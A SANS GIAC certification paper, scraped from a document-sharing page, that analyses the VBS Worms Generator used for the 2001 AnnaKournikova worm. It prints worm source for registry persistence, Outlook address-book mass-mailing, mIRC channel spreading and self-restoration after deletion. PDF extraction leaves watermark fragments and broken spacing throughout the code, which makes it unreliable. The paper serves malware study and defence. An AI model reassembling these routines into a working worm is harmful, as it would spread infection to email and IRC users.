0% found this document useful (0 votes)
17 views7 pages

Vbs Worms Generator - 451

Uploaded by

vanel
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
17 views7 pages

Vbs Worms Generator - 451

Uploaded by

vanel
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Global Information Assurance Certification Paper

Copyright SANS Institute


Author Retains Full Rights
This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without express written permission.

Interested in learning more?


Check out the list of upcoming events offering
"Security Essentials: Network, Endpoint, and Cloud (Security 401)"
at http://www.giac.org/registration/gsec
Alberto Grazi
GSEC - GIAC LevelOne Security Essentials Certification

Introduction

s.
ht
The “VBS Worms Generator” ( from now on vbswg) is a worm generator for

rig
Window s w ritten by a 17 years o ld boy whose name is [K]Alamar [1]. W ith
the words “w orm generator” we mean a software tool w hich is able to

ull
generate customisable virus code.

f
This software, in particular, lets the creator customize most of the aspects of

ns
Key the behaviours
fingerprint of the
= AF19 FA27virus.
2F94However,
998D FDB5 a single
DE3Dskeleton is used
F8B5 06E4 A169w4E46
it h many

tai
plug-in s. The user can choos e which ones to activate.

re
This tool is particularly infamous because it w as the one used at the

or
beginning of February 2001 to create the “AnnaKournicova worm” [2] which
in a few days managed to infect thousands of computers worldwide. The

th
worm was generat ed by a 20 year old man w ho goes by the name of
Au
OnTheFly who didn’t realize the damage he was about to inflict: he could now
be facing a prison sentence of up to four years [3].
2,
00

This is a screen shot of how the program’s console looks like:


-2
00
20
te
tu
sti
In
NS
SA
©

Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Here is a list of all the possible features:

• Start w ith Windows (by registry key): the worm will be activ ated every
time W indows starts
• Worm backup : a copy of the worm’s code w ill be copied in a safe

s.
location on the victim’s machine

ht
• Outlook replic ation : this is the mechanism the virus w ill use to spread

rig
itself by email. Two options are available: to send attachments or to
send HTML code with the virus embedded
• Mirc replic ation : the Mirc in itialisation file (mirc.ini) is altered in order to

ull
spread the worm by IRC

f
• Pirch replication: same principle used by the Mirc replication but the

ns
Pirch= initialisation
Key fingerprint AF19 FA27 file is changed
2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

tai
• Other files infected : a search on all the disks (network drives inc luded)
will be performed and the worm will overw rit e it self onto all the files

re
with extension .vbe and .vbs. It will also search for the files mirc.ini

or
and pirch.ini in order to detect installations of Mirc and Pirch
• Payloads: it is possible to add some actions to be performed by the

th
virus on a specific date: display a message with a p icture in an alert
Au
box, open a web page or crash the system using two different
methods.
2,
• Anti deletion method : the worm becomes memory resident and the
00

system is re -infected in case of deletion of the original source code


• Crypt code : the code of the virus is encrypted.
-2

• Download and execute files : a URL chosen by the “attacker” will


become the default home page for IE. If the URL points to a malic ious
00

file once downloaded it will be executed.


20
te

The source code


tu
sti

Let’s examine in details now the source code gen erated by vbsw g for some of
In

the sections.
NS

All the code generated by this tool is encrypted in a very simple but effective
form (unless the strong encryption is chosen): all the names of variables and
SA

functions are randomly generated and the strings are in itia lised w ith
concatenations of the ASCII values of the characters. This makes it more
©

difficult to debug and understand what the code does for an inexperienced
person.
In the examples shown here all the variable s are in cle ar text and the registry
keys are show n w ith their p roper names although I have omitted few lines of
Key code substituting
fingerprint = AF19them
FA27w2F94
it h some comments
998D (marked
FDB5 DE3D F8B5in06E4italicA169
s). 4E46

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Start with Windows
Set ws = C reateObj ect( "WScript .She ll")
ws.reg writ e "HKLM\ SOFT WARE \Mic roso ft \Windo ws \C urrentVe rsio n \",
"Run \{r egke y} ","wsc ript .exe c: \ wind ows \{wor m} .v bs %"

s.
ht
This code create a registry key whose value is executed every time w indows

rig
is started. The name of the registry key and the name of the file executed are
parametric and decided by the “attack er” (which is generating the worm).

ull
Outlook replication by attachment

f
ns
Key fingerprint = AF19
Functi FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
on O utlook()

tai
On Er ror Resume N ext
Set O utlo okApp = Crea teObject ("Ou tlook.Ap plic ation")

re
If Ou tloo kApp = " Outl ook" The n
Set Mapi = Outlo okAp p.GetNam eSpa ce("MAPI ")

or
set mapi adl ist a s Ma pi.Addre ssLi sts
For Each Address list In map iadl ist

th
If Addr esslist. Addr essEntri es.C ount <> 0 Th en
Au
Ad dres slistcou t = Addressl ist. AddressE ntri es.Count
Fo r Ad dList = 1 To Address list cout
S et m sg = Out look App.Crea teIt em(0)
2,
S et A dEntries = A ddressli st.A ddressEn trie s(AddLis t)
00

m sg.T o = AdEn trie s.Addres s


m sg.S ubject = "Su bject"
-2

m sg.B ody = "M essa ge Body"


s et A ttachs=m sg.A ttachmen ts
00

A ttac hs.Add " c: \w indow \wo rm.v bs"


m sg.D eleteAft erSu bmit = T rue
20

I f ms g. To <> "" T hen


msg. Send
E nd I f
te

Ne xt
tu

registry .reg write "H KCU \ software \myw orm \mail ed", "1"
End If
sti

Next
In

End I f
End Fu ncti on
NS

This function is the one responsible to send an email with an attachment to


SA

all the people in the addres s-book of the victim’s computer. At first it is
checked to ensure that there is at least one recipient in the address -book and
©

then a new message is created with subject and body which is decided by the
“attacker”.
Attached to this mail there is a copy of the worm itself and the copies of the
message just sent are deleted in order to remove any track of the action
taken.
Key Afingerprint = AF19
registry key FA27
is also 2F94to
created 998D
keepFDB5
trackDE3D
if the F8B5 06E4
virus has A169 4E46
already been sent
by email. Doing a comparison with the routine used by the “Love Letter” virus
it is possible to say that this one is less sophistic ated because it doesn’t keep
track of the new additions to the address -book, once mailed the virus is not
sent anymore.

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Outlook Replication by HTML
Functi on O utlookBo dy()
On Er ror Resume N ext
Set f so = CreateO bjec t("scrip ting .filesys temo bject")

s.
Set O utlo ok = Cre ateO bject("O utlo ok.Appli cati on")

ht
If Ou tloo k = "Out look " Then
Set Myse lf = fso .ope ntextfil e(ws cript.sc ript fullname , 1)

rig
I = 1
Do W hile Myself. aten dofstrea m = False

ull
MyL ine = Myself .rea dline
Cod e = Code & C hr(3 4) & " & vbc rlf & " & Ch r(34) &

f
Replace( MyLi ne, Chr( 34), Chr(34) & " &chr(34) &" &

ns
Chr(34))
Key Loop
fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

tai
Myse lf.C lose

re
Lots o f li nes of c ode to creat e an HTML pa ge w hich
contai ns t he sourc e co d e of th e wo rm. The vari able is

or
called Htm lBody

th
Set mapi = Outlo ok.G etNameSp ace( "MAPI")
Set Mapi add=mapi .Add ressList s
For Each Address list In Mapi add
Au
If Addr esslist. Addr essEntri es.C ount <> 0 Th en
2,
Ad dCou nt = Add ress list.Add ress Entries. Coun t
00

Se t Ms g = Outl ook. CreateIt em(0 )


Ms g.Su bject = "Sub ject"
-2

Ms g.Ht mlBody = Htm lBody


Ms g.De leteAfte rSub mit = Tr ue
Fo r II = 1 To AddC ount
00

S et A ddentry = Ad dresslis t.Ad dressEnt ries (II)


I f Ad dCount = 1 T hen
20

Msg. BCC = Ad dent ry.Addre ss


E lse
te

Msg. BCC = Ms g.BC C & "; " & A ddentry. Addr ess
tu

E nd I f
Ne xt
sti

Ms g.se nd
End If
In

Next
Outl ook. Quit
NS

End I f
End Fu ncti on
SA

This function creates and sends a new email message to all the recipients in
©

the address book. The subjec t is parametric while the body is an HTML page
wit h a copy of the worm itself which is executed on the victim’s computer as
soon as he tries to preview or open the email.
The worm will then be executed if the victim will allow the ActiveX to be
executed o n his machine.
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Mirc replication
Functi on M irc(Path )
On Er ror Resume N ext
Set f so = CreateO bjec t("scrip ting .filesys temo bject")

s.
Set w s = CreateOb ject ("wscrip t.sh ell")

ht
If Pa th = "" Then
If f so.f ileexist s("c : \mirc \m irc. ini") Th en

rig
Pat h = "c: \mirc "
End If

ull
If f so.f ileexist s("c : \mirc32 \mir c.ini") Then
Pat h = "c: \mirc 32"

f
End If

ns
PfDi r=ws .regread ("HK EY_LOCAL _MAC HINE \Sof twar e \Micros oft \ Windo
Key ws\Cur
fingerprint rent Version
= AF19 \ Prog
FA27 2F94 ramFiles
998D FDB5 Dir" )
DE3D F8B5 06E4 A169 4E46

tai
If f so.f ileexist s(Pf Dir & " \ mirc \mirc.in i") Then
Pat h = PfDir & " \mi rc"

re
End If
End I f

or
If Pa th < > "" The n
Set Scri pt = fso .Cre ateTextF ile( Path & " \scr ipt.ini" , Tr ue)

th
Scri pt.w riteline "[s cript]"
Au
Scri pt.w riteline "n0 =on 1:JO IN:# :{"
Scri pt.w riteline "n1 = /if ( $ni ck == $m e ) { halt } "
Scri pt.w riteline "n2 = / ." & chr (100) & chr( 99) & ch r(99 ) &
2,
" s end $nic k c: \windows \wor m.vbs"
00

Scri pt.w riteline "n3 =}"


Scri pt.C lose
-2

End I f
End Fu ncti on
00

This routine checks the existence of the Mirc software on the victim’s machine
20

and it changes the initi alisation script in order to infect other users on Irc. To
check if the softw are is installed, it checks the existence of the initialisation
te

files in two directories and in a registry key. If the file exists, a new file called
tu

“script.ini” is created: this file will send the worm to every Irc channels the
sti

victim w ill join.


In
NS

Antideletion method
SA

Functi on A ntidelet e()


Set f so = CreateO bjec t("scrip ting .filesys temo bject")
Set M ysel f = fso. open textfile (wsc ript.scr iptf ullname, 1)
©

MyCod e = Myself.r eada ll


Mysel f.Cl ose
Do
If N ot ( fso.file exis ts(wscri pt.s criptful lnam e)) Then
Set Mys elf= fso .cre atetextf ile( wscript. scri ptfullna me, True)
Mys elf. write My Code
Key fingerprintMys
= AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
elf. Close
End If
Loop
End Fu ncti on

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
If the creator chooses to activate this add -on, this w ill be the last function
called by the work because it never ends. The w orm w ill enter into an infinite
loop checking continuously if the source code is st ill on the disk: if it is
deleted, it recreates itself.

s.
ht
Main()

rig
The main section of the worm is the one responsible to set -up the global

ull
variable s, save the first copy of the worm on the victim’s file system and call
all the other functions. All the names of the variables and functions are

f
randomly generated by the vbswg and the length is parametric.

ns
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

tai
Conclusion

re
or
Now adays this virus is detected by most of the well -know n antivirus softw are

th
but for few days, when the antivirus companies where updating their
signatures, it was a real threat. Vbswg is also detected by most of the AV
Au
software as Trojan.
2,

Again, users have to be educated to use the e -mail service: this can be
00

enforced by company polic ies for what concerns w ork places and it could be
-2

achieved by restricting the default permissions on email re aders, displaying


warnings and alerts. As reported on the “VX Heaven” web site: “ Viruses don’t
00

harm ignorance do! ”


20
te

Sources
tu
sti

[1] [K]Alamar Personal Home Page


In

http://virii. at/k/
NS

[2] TrendMicro Virus Encyc lopaedia


SA

http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_KALA
MAR.A
©

[3] “Man arrested over Kournikova virus”, 14 Feb 2001 – BBC World Service
http://new s.bbc.co.uk/hi/english/w orld/europe/new sid_1170000/1170176.stm

[4] Virus Heavens – Virus Creat ion Tools


Key http://vx.netlux.org/dat/vct.shtml
fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

[5] VBScript Language Reference – Microsoft


http://msdn.microsoft.com/scripting/vbsc ript/doc/vbstoc.htm

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.

You might also like